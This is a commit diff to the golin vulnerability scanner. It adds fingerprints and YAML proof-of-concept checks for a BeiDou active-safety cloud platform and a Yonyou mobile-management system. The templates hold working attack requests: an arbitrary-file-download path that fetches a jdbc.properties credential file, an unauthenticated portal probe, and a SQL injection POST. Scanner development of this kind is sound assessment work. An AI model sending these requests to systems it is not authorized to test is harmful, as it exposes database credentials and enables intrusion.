增加识别北斗主动安全云平台任意文件读取；用友-移动系统管理未授权访问、SQL注入漏洞

Author: selinuxG

Protocol/web.go

@@ -11,6 +11,7 @@ import (
 	"golin/poc"
 	"io"
 	"net/http"
+	"os"
 	"regexp"
 	"strings"
 	"time"
@@ -125,6 +126,14 @@ func handleRequest(client *http.Client, info *WebInfo) ([]byte, error) {
 	info.server = resp.Header.Get("Server")
 	info.app = CheckApp(string(body), resp.Header, resp.Cookies(), info.server) // 匹配组件
 
+	if os.Getenv("html") == "on" {
+		fmt.Printf("-----> URL: %s HTML正文:\n%s\n", info.url, string(body))
+		fmt.Printf("-----> Header:\n")
+		for k, v := range resp.Header {
+			fmt.Println(k, "->", v)
+		}
+	}
+
 	return body, nil
 }
 

Protocol/web_RuleDatas.go

@@ -361,4 +361,6 @@ var RuleDatas = []RuleData{
 	{"人力资源信息管理系统", "body", "(<title>人力资源信息管理系统</title>|<div class=\"hj-hy-all-one-logo)"},
 	{"EasyCVR视频管理平台", "body", "<title>EasyCVR</title>"},
 	{"Docker-RemoteAPI", "headers", "(Api-Version|X-Docker-Registry-Version)"},
+	{"北斗主动安全云平台", "body", "url=808gps/login.html"},
+	{"用友-移动系统管理", "headers", "W/\"102-1379069896000\""},
 }

README.md

@@ -60,6 +60,8 @@
 | 42 |     飞致云-DateEase      |  √   | 仅验证默认账户  |
 | 43 |   Apache-Solr-Admin   |  √   | 仅验证未授权访问 |
 | 44 |     EasyCVR视频管理平台     |  √   | 仅验证默认账户  |
+| 45 |       用友-移动系统管理       |  √   | 仅验证未授权访问 |
+
 
 
 ## 资产扫描现阶段支持功能

poc/yaml-poc/poc-yaml-bdzdaqpt-Directory.yaml

@@ -0,0 +1,9 @@
+name: poc-yaml-北斗主动安全云平台-Directory
+description: "任意文件下载"
+method: GET
+path:
+  - "/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties"
+expression:
+  status: 200
+  body_any:
+    - "jdbc"

poc/yaml-poc/poc-yaml-yongyou-ydxtgl-leak.yaml

@@ -0,0 +1,10 @@
+name: poc-yaml-用友-移动系统管理-unauth
+description: "未授权访问"
+method: GET
+path:
+  - /maportal/
+expression:
+  status: 200
+  body_any:
+    - "欢迎你"
+    - "管理员"

poc/yaml-poc/poc-yaml-yongyou-ydxtgl-sql.yaml

@@ -0,0 +1,12 @@
+name: poc-yaml-用友-移动系统管理-sql
+description: "sql注入"
+method: POST
+body: "appname=1&sys_type=&loginmode=&joinmode="
+headers:
+  Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
+path:
+  - /maportal/appmanager/init
+expression:
+  status: 200
+  body_all:
+    - "productlist"